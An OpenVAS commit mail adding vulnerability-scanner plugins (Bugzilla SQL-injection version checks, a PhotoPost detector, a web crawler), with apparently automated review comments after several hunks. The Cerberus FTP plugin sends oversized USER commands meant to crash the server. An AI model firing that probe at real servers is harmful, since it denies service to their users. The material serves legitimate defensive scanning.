[Openvas-commits] r5358 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Fri Oct 2 19:48:18 CEST 2009


Author: mime
Date: 2009-10-02 19:48:14 +0200 (Fri, 02 Oct 2009)
New Revision: 5358

Added:
   trunk/openvas-plugins/scripts/bugzilla_36371.nasl
   trunk/openvas-plugins/scripts/bugzilla_36373.nasl
   trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl
   trunk/openvas-plugins/scripts/photopost_detect.nasl
   trunk/openvas-plugins/scripts/webmirror.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/cve_current.txt
   trunk/openvas-plugins/scripts/misc_func.inc
   trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl
   trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl
   trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl
Log:
Added new plugins.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/ChangeLog	2009-10-02 17:48:14 UTC (rev 5358)
@@ -1,3 +1,20 @@
+2009-10-02  Michael Meyer <michael.meyer at intevation.de>
+
+	* scripts/photopost_detect.nasl,
+	scripts/bugzilla_36373.nasl,
+	scripts/cerberus_ftp_server_36390.nasl,
+	scripts/bugzilla_36371.nasl,
+	scripts/webmirror.nasl:
+	Added new plugins.
+
+	* scripts/sambar_cgi_path_disclosure.nasl,
+	scripts/ypupdated_remote_exec.nasl,
+	scripts/secpod_surgemail_detect.nasl:
+	Bugfixes.
+
+	* scripts/misc_func.inc:
+	Added function get_unknown_svc().
+
 2009-10-01  Thomas Reinke <reinke at securityspace.com>
 	* scripts/secpod_ibm_lotus_notes_html_inj_vuln_win.nasl:
 	Fix typo.

Modified: trunk/openvas-plugins/cve_current.txt
===================================================================
--- trunk/openvas-plugins/cve_current.txt	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/cve_current.txt	2009-10-02 17:48:14 UTC (rev 5358)
@@ -99,3 +99,6 @@
 36554                           Greenbone       svn             R
 36490                           Greenbone       svn             R
 CVE-2009-3103                   Greenbone       svn             R
+CVE-2009-3125                   Greenbone       svn             R
+36390                           Greenbone       svn             R
+CVE-2009-3165                   Greenbone       svn             R

Added: trunk/openvas-plugins/scripts/bugzilla_36371.nasl
===================================================================
--- trunk/openvas-plugins/scripts/bugzilla_36371.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/bugzilla_36371.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Mozilla Bugzilla 'Bug.search()' WebService Function SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100286);
+ script_bugtraq_id(36371);
+ script_cve_id("CVE-2009-3125");
+ script_version ("1.0-$Revision$");
+
+ script_name("Mozilla Bugzilla 'Bug.search()' WebService Function SQL Injection Vulnerability");
+
+desc = "Overview:
+Bugzilla is prone to an SQL-injection vulnerability because it fails
+to sufficiently sanitize user-supplied data before using it in an SQL
+query.
+
+Exploiting this issue could allow an attacker to compromise the
+application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+The following versions are affected:
+
+Bugzilla 3.3.2 through 3.4.1 Bugzilla 3.5
+
+Solution:
+Updates are available. Please see the references for details.
+
+References:
+http://www.securityfocus.com/bid/36371
+https://bugzilla.mozilla.org/show_bug.cgi?id=515191
+http://www.bugzilla.org/security/3.0.8/
+http://www.bugzilla.org
+
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if Bugzilla is prone to an SQL-injection vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("bugzilla_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if (!can_host_php(port:port)) exit(0);
+
+if(!version = get_kb_item(string("www/", port, "/bugzilla/version")))exit(0);
+
+if(!isnull(version) && version >!< "unknown") {
+
+  if(version_in_range(version:version, test_version:"3.4", test_version2:"3.4.1") ||
+     version_in_range(version:version, test_version:"3.3", test_version2:"3.3.4") ||
+     version_is_equal(version:version, test_version:"3.5")) {
+      security_warning(port:port);
+      exit(0);
+  }
+}
+
+exit(0);
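Review bot: The `if (!can_host_php(port:port)) exit(0);` gate ahead of the KB lookup looks wrong for this product: Bugzilla is a Perl application, so a host that serves it without PHP may exit here and never be reported. The same line appears in bugzilla_36373.nasl. I would drop the gate in both scripts and rely on the `www/<port>/bugzilla/version` key, which is presumably set by bugzilla_detect.nasl. Separately, the description lists 3.3.2 through 3.4.1 as affected, but `test_version:"3.3"` also flags 3.3 and 3.3.1, so the lower bound should probably be `test_version:"3.3.2"`.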


Property changes on: trunk/openvas-plugins/scripts/bugzilla_36371.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/bugzilla_36373.nasl
===================================================================
--- trunk/openvas-plugins/scripts/bugzilla_36373.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/bugzilla_36373.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -0,0 +1,97 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Mozilla Bugzilla 'Bug.create()' WebService Function SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100287);
+ script_bugtraq_id(36373);
+ script_cve_id("CVE-2009-3165");
+ script_version ("1.0-$Revision$");
+
+ script_name("Mozilla Bugzilla 'Bug.create()' WebService Function SQL Injection Vulnerability");
+
+desc = "Overview:
+Bugzilla is prone to an SQL-injection vulnerability because it fails
+to sufficiently sanitize user-supplied data before using it in an SQL
+query.
+
+Exploiting this issue could allow an attacker to compromise the
+application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+The following versions are vulnerable:
+
+Bugzilla 2.23.4 through 3.0.8 Bugzilla 3.1.1 through 3.2.4 Bugzilla
+3.3.1 through 3.4.1
+
+Solution:
+Updates are available. Please see the references for details.
+
+References:
+http://www.securityfocus.com/bid/36373
+https://bugzilla.mozilla.org/show_bug.cgi?id=515191
+http://www.bugzilla.org/security/3.0.8/
+http://www.bugzilla.org
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if Bugzilla is prone to an SQL-injection vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("bugzilla_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if (!can_host_php(port:port)) exit(0);
+
+if(!version = get_kb_item(string("www/", port, "/bugzilla/version")))exit(0);
+if(!isnull(version) && version >!< "unknown") {
+
+  if(
+     version_in_range(version:version, test_version:"3.4", test_version2:"3.4.1")   ||
+     version_in_range(version:version, test_version:"3.3", test_version2:"3.3.4")   ||
+     version_in_range(version:version, test_version:"3.2", test_version2:"3.2.4")   ||
+     version_in_range(version:version, test_version:"3.1", test_version2:"3.1.4")   ||
+     version_in_range(version:version, test_version:"3.0", test_version2:"3.0.8")   ||
+     version_in_range(version:version, test_version:"2.23", test_version2:"2.23.4") ||
+     version_in_range(version:version, test_version:"2.4", test_version2:"2.9")) {
+      security_warning(port:port);
+      exit(0);
+  }
+}
+
+exit(0);
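Review bot: The version ranges in the `if(` do not match the affected versions given in the description. The description lists 2.23.4 through 3.0.8, 3.1.1 through 3.2.4 and 3.3.1 through 3.4.1, but the checks start at `"2.23"`, `"3.1"` and `"3.3"`, so releases below the stated lower bounds are flagged as well. The extra `test_version:"2.4", test_version2:"2.9"` range is not listed as affected at all and, if version_in_range compares components numerically, lies entirely below 2.23.4. I would align the lower bounds with the advisory (`test_version:"2.23.4"`, `test_version:"3.1.1"`, `test_version:"3.3.1"`) and either remove the 2.4–2.9 range or add a comment explaining why it is there.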


Property changes on: trunk/openvas-plugins/scripts/bugzilla_36373.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -0,0 +1,115 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Cerberus FTP Server Long Command Remote Denial of Service Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100284);
+ script_bugtraq_id(36390);
+ script_version ("1.0-$Revision$");
+
+ script_name("Cerberus FTP Server Long Command Remote Denial of Service Vulnerability");
+
+desc = "Overview:
+Cerberus FTP Server is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to terminate the affected
+application, denying service to legitimate users.
+
+This issue affects Cerberus FTP Server 3.0.3 through 3.0.6; other
+versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/36390
+http://www.cerberusftp.com/index.html
+http://www.securityfocus.com/archive/1/506858
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if Cerberus FTP Server is prone to a	denial-of-service vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("FTP");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl");
+ script_require_ports("Services/ftp", 21);
+ exit(0);
+}
+
+include("ftp_func.inc");
+
+if(safe_checks())exit(0);
+
+ftpPort = get_kb_item("Services/ftp");
+if(!ftpPort){
+  ftpPort = 21;
+}
+
+if(get_kb_item('ftp/'+ftpPort+'/broken'))exit(0);
+
+if(!get_port_state(ftpPort)){
+  exit(0);
+}
+
+if(!banner = get_ftp_banner(port:ftpPort))exit(0);
+
+if("Cerberus" >!< banner)exit(0);
+
+soc1 = open_sock_tcp(ftpPort);
+soc2 = open_sock_tcp(ftpPort);
+soc3 = open_sock_tcp(ftpPort);
+soc4 = open_sock_tcp(ftpPort);
+
+if(!soc1 || !soc2 || !soc3 || !soc4){
+  exit(0);
+}
+
+req1 = string("USER ", crap(data: raw_string(0x41), length: 330), "\r\n");
+req2 = string("USER ", crap(data: raw_string(0x41), length: 520), "\r\n"); 
+req3 = string("USER ", crap(data: raw_string(0x41), length: 2230), "\r\n");
+
+send(socket:soc1, data:req1);
+send(socket:soc2, data:req2);
+send(socket:soc3, data:req3);
+send(socket:soc4, data:req1);
+
+close(soc1);
+close(soc2);
+close(soc3);
+close(soc4);
+
+sleep(3);
+
+soc = open_sock_tcp(ftpPort);
+
+if(!ftp_recv_line(socket: soc)) {
+   security_warning(port:ftpPort);
+   if(soc)close(soc);
+   exit(0);
+}   
+
+if(soc)close(soc);
+
+exit(0); 
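Review bot: `script_category(ACT_GATHER_INFO)` understates what this script does. After the banner check it sends oversized `USER` commands meant to stop the server, so it should be registered as `ACT_DENIAL` so that scan policies excluding disruptive tests skip it; at present `safe_checks()` is the only guard. The final probe calls `ftp_recv_line(socket: soc)` without first checking that `open_sock_tcp` returned a socket, and a connection refused for an unrelated reason (for example a per-client connection limit) would be reported as a crash. Testing `if(!soc)` explicitly and stating in the report which condition triggered would make the finding easier to triage. The early `exit(0)` when one of the four sockets fails to open also leaves the ones that did open unclosed.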


Property changes on: trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/misc_func.inc
===================================================================
--- trunk/openvas-plugins/scripts/misc_func.inc	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/misc_func.inc	2009-10-02 17:48:14 UTC (rev 5358)
@@ -3,6 +3,27 @@
 # (C) 2002 Michel Arboi <arboi at alussinan.org>
 # $Revision: 1.53 $
 
+function get_unknown_svc()
+ {
+
+   local_var port;
+  
+   if(!isnull(_FCT_ANON_ARGS[0])) {
+     port = _FCT_ANON_ARGS[0];
+   } else {
+     port = get_kb_item("Services/unknown");
+   } 
+
+   if(!port)return 0;
+   if (port == 139)return 0;
+
+   if(service_is_unknown(port:port)) {
+    return port;
+   }  else {
+    return 0;
+   }  
+ }     
+
 function register_service(port, proto, ipproto)
 {
   local_var	k;
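Review bot: get_unknown_svc() is added to a shared include without any comment stating its contract, and the `if (port == 139)return 0;` exclusion is unexplained. I would add a header comment such as `# Returns the port given as first anonymous argument (or Services/unknown from the KB) if service_is_unknown() confirms it, else 0.` and a one-line comment saying why port 139 is skipped. The comment should also state that callers must treat a return of 0 as "nothing to test". get_unknown_svc is complete within this hunk; register_service's body continues outside it.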

Added: trunk/openvas-plugins/scripts/photopost_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/photopost_detect.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/photopost_detect.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -0,0 +1,105 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Photopost Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+# need desc here to modify it later in script.
+desc = "Overview:
+This host is running Photopost, a photo sharing gallery software.
+
+See also:
+http://www.photopost.com/
+
+Risk factor : None";
+
+if (description)
+{
+ script_id(100285);
+ script_version ("1.0-$Revision$");
+
+ script_name("Photopost Detection");
+ script_description(desc);
+ script_summary("Checks for the presence of Photopost");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/photopost","/photos","/gallery",cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/index.php");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
+ if( buf == NULL )continue;
+
+ if(egrep(pattern: "<a [^>]+>Photo Sharing Gallery by PhotoPost", string: buf, icase: TRUE) &&
+    egrep(pattern: "Copyright.*All Enthusiast, Inc", string: buf, icase: TRUE)
+   )
+ {
+     if(strlen(dir)>0) {
+        install=dir;
+     } else {
+        install=string("/");
+     }
+
+    vers = string("unknown");
+
+    set_kb_item(name: string("www/", port, "/photopost"), value: string(vers," under ",install));
+
+    info = string("None\n\nPhotoPost Version '");
+    info += string(vers);
+    info += string("' was detected on the remote host in the following directory(s):\n\n");
+    info += string(install, "\n");
+
+    desc = ereg_replace(
+        string:desc,
+        pattern:"None$",
+        replace:info
+    );
+
+       if(report_verbosity > 0) {
+         security_note(port:port,data:desc);
+       }
+       exit(0);
+
+ }
+}
+exit(0);
+
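Review bot: `vers = string("unknown");` is never updated, so the KB entry `www/<port>/photopost` always reads `unknown under <dir>` and any later check keyed on it cannot compare versions. If the page exposes a version string, it should be parsed from `buf` here; otherwise a comment such as `# version is not exposed on index.php, recorded as unknown` would make the limitation explicit. The `exit(0)` inside the loop also stops at the first matching directory, although the report text says "directory(s)".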


Property changes on: trunk/openvas-plugins/scripts/photopost_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl
===================================================================
--- trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -68,7 +68,7 @@
     req = http_get(port: port, item: strcat(dir, "/", fil));
     r = http_keepalive_send_recv(port:port, data: req);
     p = strcat("SCRIPT_FILENAME:*", fil);
-    if (match(string: r, pattern: p) || r =~ 'DOCUMENT_ROOT:[ \t]*[A-Z]\\\\')
+    if (r && (match(string: r, pattern: p) || r =~ 'DOCUMENT_ROOT:[\t]*[A-Z]\\\\'))
     {
       security_warning(port);
       exit(0);
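Review bot: The new condition drops the space from the character class: `[ \t]*` became `[\t]*`, so a response containing `DOCUMENT_ROOT: C:\` (space after the colon) no longer matches the second alternative. Nothing in the log suggests this was intended, and the added `r &&` guard looks like the actual bugfix. I would keep the guard and restore the class: `if (r && (match(string: r, pattern: p) || r =~ 'DOCUMENT_ROOT:[ \t]*[A-Z]\\\\'))`. The enclosing loop starts and ends outside the hunk.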

Modified: trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -87,8 +87,8 @@
   exit(0);
 }
 
-sndReq = http_get(item:"/", port:surge_port);
-rcvRes = http_send_recv(port:surge_port, data:sndReq);
+sndReq = http_get(item:"/", port:surgemail_port);
+rcvRes = http_send_recv(port:surgemail_port, data:sndReq);
 
 if(egrep(pattern:"SurgeMail", string:rcvRes, icase:1))
 {

Added: trunk/openvas-plugins/scripts/webmirror.nasl
===================================================================
--- trunk/openvas-plugins/scripts/webmirror.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/webmirror.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -0,0 +1,1200 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# WEBMIRROR 2.0
+#
+# Saved from
+# http://patch-tracker.debian.org/patch/misc/view/nessus-plugins/2.2.10-6/scripts/webmirror.nasl
+#
+# Authors:
+# Renaud Deraison <deraison at nessus.org>. 
+#
+# includes some code by H D Moore <hdmoore at digitaldefense.net>
+#
+# Modified by Michael Meyer <michael.meyer at intevation.de>
+#
+# Copyright:
+# Copyright (c) 2001 - 2003 Renaud Deraison
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(10662);
+ script_version("$Revision$");
+ script_name("Web mirroring");
+ 
+ desc = "
+This script makes a mirror of the remote web site(s)
+and extracts the list of CGIs that are used by the remote
+host.
+
+It is suggested you give a high timeout value to
+this plugin and that you change the number of
+pages to mirror in the 'Options' section of
+the client.
+
+Risk factor : None";
+
+ script_description(desc);
+ script_summary("Performs a quick web mirror");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("This script is Copyright (C) 2001 - 2003 Renaud Deraison");
+ script_family("Web application abuses");
+ script_dependencie("find_service.nes", "httpver.nasl", "DDI_Directory_Scanner.nasl");
+ script_require_ports("Services/www", 80);
+ script_add_preference(name:"Number of pages to mirror : ",
+ 			type:"entry",
+			value:"200");
+ script_add_preference(name:"Start page : ",
+ 			type:"entry",
+			value:"/");			
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+
+#-------------------------------------------------------------------------#
+function my_http_recv(socket)
+{
+  local_var	h, b, l;
+ 
+  h = http_recv_headers2(socket:socket);
+  if(!h)return(NULL);
+  
+  if("Content-Type" >< h)
+  {
+   if(!egrep(pattern:"^Content-Type: text/(xml|html)", string:h))return(h);
+  }
+  
+  b = http_recv_body(socket: socket, headers: h, length:0);
+  return (string(h, "\r\n", b));
+}
+
+
+
+function my_http_keepalive_recv()
+{
+  local_var headers, body, length, tmp, chunked, killme;
+
+  killme = 0;
+  length = -1;
+  headers = http_recv_headers2(socket:__ka_socket);
+  if(strlen(headers) == 0)headers = http_recv_headers2(socket:__ka_socket);
+  
+  if(ereg(pattern:"^HEAD.*HTTP/.*", string:__ka_last_request))
+   {
+   # HEAD does not return a body
+   return(headers);
+   }
+  
+  if("Content-Type" >< headers)
+  {
+   if(!egrep(pattern:"^Content-Type: text/(xml|html)", string:headers))
+   	{
+	 http_close_socket(__ka_socket);
+	 __ka_socket = 0;
+	 return(headers);
+	}
+  }
+  
+  if("Content-Length" >< headers)
+  {
+    tmp = egrep(string:headers, pattern:"^Content-Length: [0-9]*");
+    length = int(ereg_replace(string:tmp, pattern:"^Content-Length: ([0-9]*)", replace:"\1"));
+  }
+  
+ 
+
+ if((length < 0) && (egrep(pattern:"transfer-encoding: chunked", string:headers, icase:TRUE)))
+ {
+   while(1)
+   {
+   tmp = recv_line(socket:__ka_socket, length:4096);
+   length = hex2dec(xvalue:tmp);
+   if(length > 512*1024)
+   	{
+   	length = 512*1024;
+	killme = 1;
+	}
+   body  = string(body, recv(socket:__ka_socket, length:length+2, min:length+2));
+   if(strlen(body) > 512*1024)killme = 1;
+   
+   if(length == 0 || killme){
+   	http_keepalive_check_connection(headers:headers);
+   	return(string(headers,"\r\n", body)); # This is expected - don't put this line before the previous
+	}
+   }
+ }
+ 
+
+ if(length >= 0)
+ {
+   if(length > 512*1024)length = 512*1024;
+   
+   body = recv(socket:__ka_socket, length:length, min:length);
+ }
+ else {
+ 	# If we don't have the length, we close the connection to make sure
+	# the next request won't mix up the replies.
+	
+ 	#display("ERROR - Keep Alive, but no length!!!\n", __ka_last_request);
+	body = recv(socket:__ka_socket, length:16384);
+	http_close_socket(__ka_socket);
+	__ka_socket =  http_open_socket(__ka_port);
+	}
+
+ 
+
+ http_keepalive_check_connection(headers:headers);
+ return(string(headers,"\r\n", body));
+}
+
+
+
+function my_http_keepalive_send_recv(port, data)
+{
+  local_var id, n;
+  
+  if(data == NULL)
+   return;
+
+  if(__ka_enabled == -1)__ka_enabled = http_keepalive_enabled(port:port);
+
+
+
+  if(__ka_enabled == 0)
+  {
+    local_var soc, r;
+    soc = http_open_socket(port);
+    if(!soc)return NULL;
+    send(socket:soc, data:data);
+    r = my_http_recv(socket:soc);
+    http_close_socket(soc);
+    return r;
+  }
+
+
+  if((port != __ka_port)||(!__ka_socket))
+  {
+    if(__ka_socket)http_close_socket(__ka_socket);
+    __ka_port = port;
+    __ka_socket =  http_open_socket(port);
+    if(!__ka_socket)return NULL;
+  }
+
+  id = stridx(data, string("\r\n\r\n"));
+  data = str_replace(string:data, find:"Connection: Close", replace:"Connection: Keep-Alive", count:1);
+  __ka_last_request = data;
+  n = send(socket:__ka_socket, data:data);
+  if(n <= 0)
+  {
+    http_close_socket(__ka_socket);
+    __ka_socket = http_open_socket(__ka_port);
+    if(__ka_socket == 0)return NULL;
+    send(socket:__ka_socket, data:data);
+  }
+
+  return(my_http_keepalive_recv());
+}
+
+#-------------------------------------------------------------------#
+
+
+function add_cgi_dir(dir)
+{
+ local_var d, dirs, req, res;
+
+ if ( num_cgi_dirs > max_cgi_dirs ) return 0;
+ 
+ req = http_get(item:string(dir, "/non-existant-", rand()), port:port);
+ req = my_http_keepalive_send_recv(port:port, data:req);
+ if(ereg(pattern:"^HTTP/[0-9]\.[0-9] 404 ", string:req))
+ {
+  dirs = cgi_dirs();
+  foreach d (dirs)
+  {
+  if(d == dir)return(0);
+  }
+ 
+  if(isnull(CGI_Dirs_List[dir]))
+  {
+   #display(CGI_Dirs_List[dir], "\n");
+   set_kb_item(name:"/tmp/cgibin", value:dir);
+   CGI_Dirs_List[dir] = 1;
+   num_cgi_dirs ++;
+  }
+ }
+}
+
+
+#--------------------------------------------------------------------------#
+
+function add_30x(url)
+{
+ if(isnull(URLs_30x_hash[url]))
+ {
+  set_kb_item(name:string("www/", port, "/content/30x"), value:url);
+  URLs_30x_hash[url] = 1;
+ }
+}
+
+
+function add_auth(url)
+{
+ if(isnull(URLs_auth_hash[url]))
+ {
+  set_kb_item(name:string("www/", port, "/content/auth_required"), value:url);
+  URLs_auth_hash[url] = 1;
+  if(url == "/")RootPasswordProtected = 1;
+ }
+}
+
+#--------------------------------------------------------------------------#
+
+num_url = 0;
+
+function add_url(url)
+{
+ local_var ext, dir;
+  
+ if ( num_url > 100 ) return 0;
+ 
+ if(debug > 5)display("**** ADD URL ", url, "\n");
+ if(isnull(URLs_hash[url]))
+ {
+  URLs = make_list(URLs, url);
+  URLs_hash[url] = 0;
+   
+  url = ereg_replace(string:url,
+  			pattern:"(.*)\?.*",
+			replace:"\1");
+			
+			
+  ext = ereg_replace(pattern:".*\.([^\.]*)$", string:url, replace:"\1");
+  if(strlen(ext) && ext[0] != "/")
+  {
+   set_kb_item(name:string("www/", port, "/content/extensions/", ext), value:url);
+  }
+  
+  dir = dir(url:url);
+  if(dir && !Dirs[dir])
+  {
+   Dirs[dir] = 1;
+   set_kb_item(name:string("www/", port, "/content/directories"), value:dir);
+   if(isnull(URLs_hash[dir]))
+   {
+    URLs = make_list(URLs, dir);
+    if(Apache)URLs  = make_list(URLs,  string(dir, "/?D=A"));
+    else if(iPlanet)URLs = make_list(URLs,  string(dir, "/?PageServices"));
+    URLs_hash[dir] =  0;
+   }
+  }
+ }
+}
+
+function cgi2hash(cgi)
+{
+ local_var cur_cgi, cur_arg, i, ret;
+ 
+ ret = make_list();
+ 
+ for(i=0;i<strlen(cgi);i++)
+ {
+  if(cgi[i] == " " && cgi[i+1] == "[")
+  {
+    cur_arg = "";
+    for(i=i+2;i<strlen(cgi);i++)
+    {
+      if(cgi[i] == "]")
+      {
+        ret[cur_cgi] = cur_arg;
+	cur_cgi = "";
+	cur_arg = "";
+	if(i + 2 >= strlen(cgi))return ret;
+	i += 2;
+	break;
+      }
+      else cur_arg += cgi[i];
+    }
+  }
+  cur_cgi += cgi[i];
+ } 
+ return ret;
+}
+
+function hash2cgi(hash)
+{
+ local_var ret, h;
+ 
+ ret = "";
+ foreach h (keys(hash))
+ {
+  ret += string(h, " [", hash[h], "] ");
+ }
+ return ret;
+}
+
+
+function add_cgi(cgi, args)
+{
+ local_var mydir, tmp, a, new_args, common, c;
+ 
+ args = string(args);
+
+ if(isnull(CGIs[cgi]))
+ {
+  CGIs[cgi] = args;
+  mydir = dir(url:cgi);
+  if(!CGIsDirs[mydir])
+  {
+   CGIsDirs[mydir] = 1;
+   add_cgi_dir(dir:mydir);
+  }
+ }
+ else {
+    tmp = cgi2hash(cgi:CGIs[cgi]);
